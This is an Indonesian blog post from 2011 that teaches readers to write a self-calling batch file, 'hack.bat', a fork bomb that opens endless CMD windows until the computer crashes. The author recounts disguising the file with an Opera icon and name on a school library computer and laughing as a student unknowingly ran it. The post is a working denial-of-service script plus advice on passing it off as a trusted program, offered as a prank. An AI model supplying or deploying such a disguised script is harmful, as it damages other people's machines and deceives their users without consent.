Thursday, October 27, 2011

Membuat Hang PC Hanya Dengan Notepad

Bookmark and Share


Notepad ternyata bukan hanya sekedar aplikasi untuk menulis saja, tetapi punya banyak sekali fungsi salah satunya dalam hal hacking. Hanya dengan mengetikkan beberapa perintak seperti di CMD pada notepad, bisa membuat komputer hang dengan waktu kurang dari 1 menit. Ga percaya? Aya dicoba !!
Gini nih caranya :
Buka Notepad dan ketik start berulang kali dengan enter
start
start
start
start
start
start
start
start
start

Kalo udah save dengan extensi .bat, contoh : hack.bat
Coba buka file yang sudah di save tadi, maka akan keluar banyak jendela CMD.
Buka kembali notepad dan open file yang tadi dibuat, di akhir baris ketikkan nama file yang tadi di save, contoh hack.bat

start
start
start
start
start
start
start
start
start
hack.bat
Hal ini akan membuat file ini membuka start 8 kali dan sekaligus membuka file hack.bat, maka akan muncul jendela CMD yang banyaaaaaaaaak sekaliiiii yang bisa membuat komputer menjadi crash dan hang. Satu-satunya cara menyembuhkannya adalah dengan merestart komputer.
Gw dah pernah nyoba trik ini di komputer perpus sekolah. setelah selesai bikin file nya dan di save, file itu gw kasih icon Opera dan gw kasih nama Opera juga. Terus gw pajang di desktop, ga taunya ada anak yang pake tuh komputer buat browsing di internet. Dia buka opera dan seketika itu juga muncul jendela CMD yang banyak bangeeet sampai komputer not responding dan ngehang. Gw cuma bisa ngliat sambil ckikikan dari kjauhan. Hohoho... ternyata lucu juga ngerjain orang kayak gitu.

No comments:

Post a Comment

video games games game download video game pc games pc games download